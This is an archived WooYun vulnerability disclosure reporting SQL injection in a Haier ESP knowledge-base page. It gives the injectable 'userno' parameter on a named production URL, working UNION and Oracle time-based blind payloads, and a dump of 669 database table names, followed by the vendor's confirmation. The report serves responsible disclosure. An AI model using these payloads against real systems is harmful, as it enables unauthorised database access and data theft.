当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147524

漏洞标题:海尔某系统SQL注入

相关厂商:海尔集团

漏洞作者: ledoo

提交时间:2015-10-19 11:35

修复时间:2015-12-03 16:58

公开时间:2015-12-03 16:58

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开

简要描述:

海尔某系统存在SQL注入漏洞

详细说明:

http://esp.haier.com/km/kb_loglist.jsp?userno=-1+OR+17-7=10&flag=3
userno参数存在注入


111.png


222.png

漏洞证明:

Place: GET
Parameter: userno
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: userno=-1 OR 17-7=10' UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)||CHR(112)||CHR(111)||CHR(116)||CHR(113)||CHR(122)||CHR(69)||CHR(79)||CHR(84)||CHR(106)||CHR(119)||CHR(100)||CHR(69)||CHR(75)||CHR(66)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113),NULL,NULL,NULL FROM DUAL-- &flag=3
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: userno=-1 OR 17-7=10' AND 5046=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(99)||CHR(116)||CHR(116),5) AND 'wZuH'='wZuH&flag=3
---
web application technology: JSP
back-end DBMS: Oracle
Database: ESP
[669 tables]
+--------------------------------+
| TRANSLATION |
| ABCD |
| ACCIDENT_HAIER |
| ACVS |
| ACVS_BJLLFS |
| ACVS_BJZL |
| ACVS_BOMCWLX |
| ACVS_BOM_GD |
| ACVS_BUDGET_ADJUST |
| ACVS_BUDGET_BUSINESS |
| ACVS_BUDGET_MODEL |
| ACVS_BUDGET_TOTAL |
| ACVS_BUDGET_USE |
| ACVS_BUDGET_WARN |
| ACVS_BUSINESS |
| ACVS_BUSINESSTYPE |
| ACVS_BUSINESS_OPREASON |
| ACVS_CHARG |
| ACVS_CHECK_CASE |
| ACVS_CHECK_CATEGORY |
| ACVS_CHECK_FREQUENCY |
| ACVS_CHECK_MODULE |
| ACVS_CHECK_RISKCONSEQUENCES |
| ACVS_CHECK_RISKLEVEL |
| ACVS_CHECK_RISKRECOGNITION |
| ACVS_CHECK_RISKTYPE |
| ACVS_CJDM |
| ACVS_DATAFLOWBIND |
| ACVS_DATATABLE |
| ACVS_EMAILWAING_FLOWFILELD |
| ACVS_ENDFLOW |
| ACVS_FACTORY |
| ACVS_FAVORMENU |
| ACVS_FBS |
| ACVS_FIELD |
| ACVS_FLOWINFO |
| ACVS_FLOWLIST |
| ACVS_FLOWTABLES |
| ACVS_FLOW_AREA |
| ACVS_FLOW_MODEL |
| ACVS_FLOW_ORG |
| ACVS_FLOW_PUNISH |
| ACVS_FORM |
| ACVS_FORM_DATA |
| ACVS_FORM_DATA_DETAIL |
| ACVS_FORM_MASTER |
| ACVS_FXK |
| ACVS_GL_PIJL |
| ACVS_GL_PX |
| ACVS_JH_WFX |
| ACVS_KEYWORDFIELD |
| ACVS_LC_WDJS |
| ACVS_LES_AUART |
| ACVS_LES_KUNAG |
| ACVS_LES_KUNWE |
| ACVS_LES_SPART |
| ACVS_LES_VKORG |
| ACVS_LES_VTWEG |
| ACVS_LOGICBIND |
| ACVS_LPS_FX |
| ACVS_LPS_XDL |
| ACVS_MOVETYPE |
| ACVS_OPREASON |
| ACVS_ORDER_FACTORY |
| ACVS_PANDIAN |
| ACVS_PI_LUNDU |
| ACVS_PI_PTD |
| ACVS_PL_CGBZ |
| ACVS_PP_CJCB |
| ACVS_PP_DJLD |
| ACVS_PP_NEIWAIXIAO |
| ACVS_PP_PCZK |
| ACVS_PP_SHDDTZ |
| ACVS_PP_SHIBAIHUOWU |
| ACVS_PP_TEST |
| ACVS_PROCESS_GCH |
| ACVS_PROCESS_LDGC1 |
| ACVS_PROCESS_LDGONGCHANG |
| ACVS_PSI_YUNWEIXMJJ |
| ACVS_PSTYP |
| ACVS_PUNISH_PERSIONGW |
| ACVS_RATING_REMARK |
| ACVS_RATING_STRATEGY |
| ACVS_RECORD_NUMBER |
| ACVS_SOBKZ |
| ACVS_SRM_CGDSF |
| ACVS_SRM_KDPP |
| ACVS_STORAGE |
| ACVS_SUPPLIER |
| ACVS_TEST_001 |
| ACVS_TIMER_STATE |
| ACVS_TRANSACTION |
| ACVS_UNIT |
| ACVS_USERROLE |
| ACVS_USER_REMARK |
| ACVS_WARNNING |
| ACVS_WGG |
| ACVS_WORKFLOW_ORG |
| ACVS_XT_ZYXQ |
| ACVS_YS |
| AOTU_MSGLINK |
| API_MAIN |
| API_PARAMETER |
| APPAREALINK |
| APPORTDETAIL |
| APPORTMASTER |
| AREA |
| ASSET_CONTROL |
| ASSET_DEVICE |
| ASSET_DEVICE_STYLE |
| ASSET_INTF |
| ASSET_MANAGE |
| AUTOCLOSEDEMAND |
| AUTO_QUESTION |
| BAOBIAOSAP |
| BILLLIST |
| BPMPROJECTPOINT |
| BPMSTOESPREPORT |
| BPMSTOESPXMCY |
| CABAPPROVED |
| CMDB_CI_CISYS |
| CMDB_CI_INSTANCE_RELATION |
| CMDB_CI_PUBLIC_PROPERTY |
| CMDB_CI_RELATION |
| CMDB_DC_CTR |
| CMDB_DC_MAN |
| CMDB_DEV_ESPD_VARIANT |
| CMDB_DEV_SAP_TROBJ |
| CMDB_HW_EPS |
| CMDB_HW_ISS |
| CMDB_HW_RUT |
| CMDB_HW_STORAGE |
| CMDB_HW_SWT |
| CMDB_HW_TPL |
| CMDB_SW_DBS |
| CMDB_SW_K |
| CMDB_SW_MON |
| CMDB_SW_MWR |
| CMDB_SW_OPS |
| CMDB_SW_SEW |
| CMDB_SW_SMW |
| CMDB_SYS_BW |
| COCODE |
| COCODECOL |
| COPYSMDROLM |
| COPYSMMMNUA |
| COPYTRANSLATION |
| CUSTOMPRODUCT |
| DATE_WEEK_YEAR |
| DAY_CLEAR |
| DAY_CLEAR_PERMISSION |
| DEMANDPROJECT_PARTONE |
| DEMANDPROJECT_PARTTWO |
| DEMANDSUPPORTER |
| DEMANDTASK_SCORE |
| DEPARTMENT |
| DM_DATA_BIND |
| DM_TABEL_TESTA |
| DM_TABEL_TESTB |
| DM_TABEL_TESTC |
| DOCUMENTREPLYCONTENT |
| DOCUMENTSCORE |
| EAI_BUSINESSDOMAIN |
| EAI_INTERFACE |
| EAI_PEOPLE |
| EAI_TRAINING |
| EDITGROUP |
| EMAIL_REMINDER_CONFIG |
| ESP_MONITOR |
| ESP_MONITORYPOINTALERTMESSAGER |
| ESP_PORTAL_USERBM |
| ESP_PROXY_PERSON |
| EVENT_AVAILABLE |
| EVENT_DETAIL |
| EVENT_DOWN_UP |
| EVENT_THRESHOLD |
| EXPDETAIL |
| EXPMASTER |
| FLOWSYS |
| FLOW_CONFIG |
| FLOW_CONFIGURE |
| FLOW_SYS |
| GGDGGLA |
| GGDGGLB |
| GGDGGLOG |
| GROUPLEADER |
| HELPMESSAGE_INFO |
| HOPE_SMS |
| ID_SEED |
| INFO_AGE |
| INFO_PRO |
| INFO_PRO_BACK |
| INTEGRALLOG |
| INTEGRALMANAGER |
| INTEGRALRULE |
| ITIL_CI_WORKFLOW |
| JBPM_ACTION |
| JBPM_BYTEARRAY |
| JBPM_BYTEBLOCK |
| JBPM_COMMENT |
| JBPM_DECISIONCONDITIONS |
| JBPM_DELEGATION |
| JBPM_EVENT |
| JBPM_EXCEPTIONHANDLER |
| JBPM_FLOWSECURITY |
| JBPM_FLOWSECURITYDETAIL |
| JBPM_FLOWSTATE |
| JBPM_ID_GROUP |
| JBPM_ID_MEMBERSHIP |
| JBPM_ID_PERMISSIONS |
| JBPM_ID_USER |
| JBPM_JOB |
| JBPM_LOG |
| JBPM_MODULEDEFINITION |
| JBPM_MODULEINSTANCE |
| JBPM_NODE |
| JBPM_POOLEDACTOR |
| JBPM_PROCESSDEFINITION |
| JBPM_PROCESSINSTANCE |
| JBPM_RUNTIMEACTION |
| JBPM_SWIMLANE |
| JBPM_SWIMLANEINSTANCE |
| JBPM_TASK |
| JBPM_TASKACTORPOOL |
| JBPM_TASKCONTROLLER |
| JBPM_TASKINSTANCE |
| JBPM_TOKEN |
| JBPM_TOKENVARIABLEMAP |
| JBPM_TRANSITION |
| JBPM_VARIABLEACCESS |
| JBPM_VARIABLEINSTANCE |
| JBPM_WORKFLOWINFO |
| JBPM_WORKFLOWPROCESS |
| JBPM_WORKFLOWTABLE |
| JBPM_WORKFLOWTABLE_DET |
| JBPM_WORKFLOW_NODETIME |
| JIEKOUSAP |
| JOBSAP |
| KBCATALOG |
| KBCATALOG_DINGYUE |
| KBDATA |
| KBDATABAK |
| KBDATA_EDIT |
| KBDATA_HISTORY |
| KBFILETRANS |
| KBLINK |
| KB_COUNT |
| KB_MSGLINK |
| KB_MSGLINKBAK |
| KB_MSGLINK_BAK |
| KB_MSGLINK_BK |
| KB_MSKLINKBAK2 |
| KB_PUBLISH |
| KB_REPLY |
| KB_SCORE |
| KB_SHARE |
| KB_SYS_CLASSIFY |
| KB_USERLOOK |
| KDDATA_BK |
| KM_REPOSITORY |
| KPIDATE |
| KPIDEPT |
| KPIEMPLOYEE |
| KPIRULE |
| LEAMASTER |
| LEVELLOG |
| LINK_QUESTION |
| LIYP |
| LOGIN_LOG |
| LOGIN_LOG_USER |
| MAILFORHOLIDAYDUTY |
| MAILTASK |
| MANAGE_ASSET_GROUP |
| MANAGE_CALENDAR |
| MANAGE_EVENT_NAME |
| MANAGE_GROUP_TYPE |
| MANAGE_IFTYPE |
| MANAGE_MIBINFO |
| MANAGE_ORG_IP |
| MANAGE_SPEED |
| MANAGE_VENDOR |
| MANAGE_WORKDAY |
| MANAGE_WORKTIME |
| MC_COCKPIT_CONFIG |
| MC_EMAIL_REMINDER_CONFIG |
| MC_EMAIL_REMINDER_CONFIG_M |
| MC_EXP2MSG_REASON |
| MC_KPI_STANDARD |
| MC_LOG |
| MC_MESSAGE_EMAIL_REMINDER |
| MC_MESSAGE_EMAIL_REMINDER3 |
| MC_MSG_HISTORY |
| MC_NOMANYI_MSG |
| MC_OBJ_USER |
| MC_ROLE_OBJS |
| MC_SAP_USER_LOCK |
| MC_UPGRADEMSG_REASON |
| MC_USER_ROLE |
| MDM_USER |
| MD_ADDITIONAL_PROPERTIES |
| MD_CATALOGS |
| MD_COLUMNS |
| MD_CONNECTIONS |
| MD_CONSTRAINTS |
| MD_CONSTRAINT_DETAILS |
| MD_DERIVATIVES |
| MD_GROUPS |
| MD_GROUP_MEMBERS |
| MD_GROUP_PRIVILEGES |
| MD_INDEXES |
| MD_INDEX_DETAILS |
| MD_MIGR_DEPENDENCY |
| MD_MIGR_PARAMETER |
| MD_MIGR_WEAKDEP |
| MD_OTHER_OBJECTS |
| MD_PACKAGES |
| MD_PRIVILEGES |
| MD_PROJECTS |
| MD_REGISTRY |
| MD_REPOVERSIONS |
| MD_SCHEMAS |
| MD_SEQUENCES |
| MD_STORED_PROGRAMS |
| MD_SYNONYMS |
| MD_TABLES |
| MD_TABLESPACES |
| MD_TRIGGERS |
| MD_USERS |
| MD_USER_DEFINED_DATA_TYPES |
| MD_USER_PRIVILEGES |
| MD_VIEWS |
| MENUCOUNT |
| MENUCOUNT_BAK |
| MENUCOUNT_NEW |
| MESSAGE_EMAIL_REMINDER |
| MIGRATION_RESERVED_WORDS |
| MIGRLOG |
| MIGR_DATATYPE_TRANSFORM_MAP |
| MIGR_DATATYPE_TRANSFORM_RULE |
| MIGR_GENERATION_ORDER |
| MKTEST1 |
| MKTEST2 |
| MODLIST |
| MONITORLINK |
| MONITORPOINT |
| MONITORPOINT_VIEW |
| MONITORYPOINTALERTMESSAGER |
| MONITORYPOINTCURRENTMESSAGE |
| MONITOR_ALERT_FILTER |
| MONITOR_CURRENTVALUE |
| MONITOR_CURRENTVALUE_DEFAULT |
| MONITOR_DUTY_SCHEDULE |
| MONITOR_MACHINE_VIEW |
| MONITOR_RESPONSE |
| MONITOR_RESPOSITORY |
| MONITOR_TOOL |
| MONTIOR_CATALOG |
| MSGFLOW |
| MSGLINK |
| MSGMAIN |
| MSGMAIN_BAK |
| MSGMAIN_BEIZHU |
| MSGMAIN_MOBILE |
| MSGPRIORITY |
| MSGPRIORITY_NEW |
| MSGREPL |
| MSGSEARCH |
| MSGSUPCONFIG |
| MSGTYPE |
| MSG_CHULILV |
| MSG_COMPONENT |
| MSG_MISS_SLA |
| MSG_PRIORITY_DEF |
| MSG_REPORT_DEF |
| MSG_REPORT_META |
| MSG_TEMPLATE |
| MSG_WORKCALENDAR |
| MSG_WORKTYPE |
| MSKBLINK |
| MTOMLINK |
| NADEMAND_USER |
| OLD_PRO |
| ORDERINFO |
| ORGANIZATION |
| ORGEMPLOYEE |
| ORGLINK |
| ORGPOSITION |
| ORGVIRTUAL |
| OTDETAIL |
| OTMASTER |
| OVERTIMEMAILLOG |
| OWNUSER_MSG |
| PLAN_TABLE |
| PMDKPI |
| PMDMSGL |
| PMDPROJECT |
| PMDSCHEDULE |
| PMDTASK |
| PORTAL_DEPOT |
| PORTAL_KQ |
| PORTAL_USER |
| PRODUCT |
| PRODUCTMAIL |
| PRODUCT_GROUP |
| PRODUCT_KEFU |
| PRODUCT_MANAGER |
| PRODUCT_MANAGER_NEW |
| PRODUCT_SUBGROUP |
| PRODUCT_UP |
| PROJECTCHANGEROLE |
| PROJECTDOCUMENT |
| PROJECTNODE |
| PROJECTNODEBAK |
| PROJROLEUSER |
| PSILIST |
| PSI_ACC_MANAGE |
| PSI_ADJUSTMENT |
| PSI_BW |
| PSI_BW_CONNECT_TYPE |
| PSI_DC_EQUIPMENTA |
| PSI_DEMANDSHIFT_FLOWTYPE |
| PSI_DEMAND_SHIFT |
| PSI_DEMAND_SHIFT_EXAMINE |
| PSI_DEMAND_SHIFT_SA |
| PSI_DEVELOPER_KEY |
| PSI_DR |
| PSI_DRADDSUB |
| PSI_DRDESTORYSUB |
| PSI_DRMOVESUB |
| PSI_EAI_EXPLOIT |
| PSI_EAI_EXPLOIT_EXAMINE |
| PSI_ESPUPDATEMAIN |
| PSI_ESPUPDATESUB |
| PSI_ETL_EXPLOIT |
| PSI_EXPLOIT_CALSS2_EXAMINE |
| PSI_EXPLOIT_CLASS |
| PSI_EXPLOIT_CLASS2 |
| PSI_EXPLOIT_CLASS_EXAMINE |
| PSI_JZZYJYTBG |
| PSI_JZZYJYTBG_PG |
| PSI_LES_YJFH |
| PSI_MACHINEROOM |
| PSI_MACHINEROOM_MANAGER |
| PSI_MODULEUSER |
| PSI_PC_BATCH |
| PSI_PC_BATCHSUB1 |
| PSI_PC_CHANGE_PASSWORD |
| PSI_PC_SERVER_CHANGE |
| PSI_PC_SERVER_CHANGESUB1 |
| PSI_PC_SERVER_CHANGESUB2 |
| PSI_PC_SERVER_CHANGESUB3 |
| PSI_SAPBACK |
| PSI_SAPBACKSUB |
| PSI_SAPOPTION |
| PSI_SAP_CHANGE_CLASS |
| PSI_SAP_CHANGE_CLASS1 |
| PSI_SAP_CHANGE_CLASS2 |
| PSI_SAP_CHANGE_MANAGEMENT |
| PSI_SERVERSETUP |
| PSI_SERVER_LEADER |
| PSI_STOPPLAN |
| PSI_STOPPLAN_SUBTABLE |
| PSI_SYSTEM |
| PSI_SYSTEMMODULE |
| PSI_TRANSPORT |
| PSI_TRANSPORT2 |
| PURDETAIL |
| PURMASTER |
| QQUPLOAD_SLA |
| RECEIVE_MSG |
| RESDETAIL |
| RESMASTER |
| RPTLIST |
| SAP_BACKGROUND_JOB |
| SAP_BACKGROUND_JOB_BACKUP |
| SAP_CHANGE_MANAGEMENT_APPROVAL |
| SAP_CHANGE_MANAGEMENT_HANDLE |
| SAP_CPU |
| SAP_CPUMEM |
| SAP_CPU_UTILIZATION |
| SAP_DB_ACCESS |
| SAP_DOC_GENERATED |
| SAP_MEM |
| SAP_MEMORY_DATA |
| SAP_MEMORY_STATISTICS |
| SAP_NO_LOGIN_USER |
| SAP_ONLINE_USER |
| SAP_RFC_CLIENT |
| SAP_RFC_SERVER |
| SAP_SETTLE_STATISTICS |
| SAP_SPOOL_STATISTICS |
| SAP_SQL_REQUEST |
| SAP_SYSTEM_ERROR_MONITOR |
| SAP_TABLE_ACCESS |
| SAP_TABLE_INCREASEMENT |
| SAP_TABLE_SPACE_GROWTH |
| SAP_TIME_PROFILE |
| SAP_TOTAL_AMOUNT_OF_PRINT |
| SAP_TRANSACTION_PROFILE |
| SAP_USER_PROFILE |
| SAP_WORKLOAD_OVERVIEW |
| SAP_WORKLOAD_USER |
| SCHDULE |
| SCHDULEHEADER |
| SC_CO |
| SC_CODE |
| SC_CO_FORM |
| SC_CP |
| SC_LANG |
| SC_LOCK |
| SC_ORGANIZATION |
| SC_ORGPOSITION |
| SC_PARAMETER |
| SC_PARAMETER_BK |
| SC_PATCH |
| SC_POSITIONUSER |
| SC_RESOURCE |
| SC_SUBSCRIBE |
| SC_SUBSCRIBE_DEF |
| SC_SUBSCRIBE_PARAM |
| SC_SUP |
| SC_SUP_TASK |
| SC_SUP_TASK_CONTENT |
| SC_WIZARDREMINDER |
| SC_WK |
| SECONDLINE_INFO |
| SECONDLINE_TIMESUM |
| SECONDLINE_USER_CONFIG |
| SELFSAP |
| SEND_MSG |
| SERVERBINDGROUP |
| SERVERINFO |
| SERVER_MANAGES |
| SHY_BHZZJ |
| SHY_CXMS |
| SHY_GJC |
| SHY_JJCS |
| SHY_WTBH |
| SHY_WTC |
| SHY_YSWT |
| SLA_RANGE |
| SLA_RANGENO |
| SMDAREA |
| SMDATTA |
| SMDATTB |
| SMDBA |
| SMDCALENDAR |
| SMDGROUP |
| SMDICON |
| SMDJOBP |
| SMDLOGA |
| SMDLOGCONF |
| SMDMAILCFG |
| SMDMODELRELA |
| SMDPARS |
| SMDROLC |
| SMDROLE |
| SMDROLM |
| SMDROLP |
| SMDSAPSERVER |
| SMDSAPTASKHISTORY |
| SMDSERVER |
| SMDTASKLOG |
| SMDUDIF |
| SMDUGRP |
| SMDUSAP |
| SMDUSRA |
| SMDUSRA_TMP |
| SMDUSRO |
| SMDUSRO_20140307 |
| SMDUSRO_BK |
| SMDUSRP |
| SMDUSRR |
| SMDWORKFLOWSETTING |
| SMMACTA |
| SMMACTB |
| SMMACTC |
| SMMADK |
| SMMAUTH |
| SMMCODEF |
| SMMCOMP |
| SMMCOMP_EXT |
| SMMMNUA |
| SMMMNUP |
| SMMPARA |
| SMMRPTA |
| SMMRPTB |
| SMMTABL |
| SMMTASK |
| SMMVIEW |
| SMS_CALL |
| SMS_CONFIG |
| SMS_SEND_MSG |
| SMS_SEND_MSG_20121206 |
| SMS_TABLE_FIELD_CONFIG |
| SMTAUTH |
| SMTUMNU |
| SMTUROL |
| SM_ORG_CONFIG |
| STAFF_SUBGROUP |
| SUN_TALBE |
| SUPPORTER_FLOW |
| SUPPORTER_PERSON |
| SUPPORTER_SYS |
| SYN_SMMACTA |
| SYN_SMMACTB |
| SYN_TRANSLATION |
| SYS_TEMP_FBT |
| TABFLD |
| TABLE_CATOGORY |
| TABLE_SB |
| TABLE_TEST |
| TABMSG |
| TB |
| TCLOB |
| TEMP_PORTAL_USER_SYN |
| TEMP_SMDUSRA |
| TEST_SMDSAPSERVER |
| TREND_CPU |
| TREND_CPU_WORK |
| TREND_INTF |
| TREND_INTF_WORK |
| TREND_MEM |
| TREND_MEM_WORK |
| T_DATA |
| T_TMP |
| UNLOCKUSER |
| UPGRADEQUESTION |
| UPGRADEQUESTION_HISTORY |
| UPLOADACCOUNT |
| UPLOADACCOUNT_BF |
| UPLOADACCOUNT_NEW |
| UPLOADCATALOG |
| UPLOADCATAMOVE |
| UQ_EMAIL_REMINDER |
| USERADVISE |
| USERFAVORITES |
| USERINTEGRAL |
| USER_ACCOUNT |
| USER_DEFINED |
| USER_DEMANDLOCK |
| WFACTIVITY |
| WFHISTORY |
| WFPARTICIPANT |
| WFPROCESS |
| WFTRANSITION |
| WF_EXPENSE |
| WF_EXPENSE_PARTICULARS |
| WIN_MSGMAIN |
| WIZARD_CONFIG |
| WORKFLOW_SUCCEDANEUM |
| WORKPLAN |
| WORKREPORT |
| W_GROUP |
| X_MSGCODE |
| X_TABLESPACE |
| X_TMP |
| YEARHOLIDAY |
| ZENGQIANGSAP |
| Z_PLAN |
| Z_PROJECT |
| Z_PROPROGRESS |
| Z_PROQUERY |
| Z_STAGE |
| Z_TASK |
| Z_TASKPROGRESS |
| Z_TASKUPLOAD |
| Z_TASK_STATE |
| Z_TIME_TASK |
+--------------------------------+

修复方案:

参数检查过滤

版权声明:转载请注明来源 ledoo@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-10-19 16:56

厂商回复:

感谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理

最新状态:

暂无


漏洞评价:

评价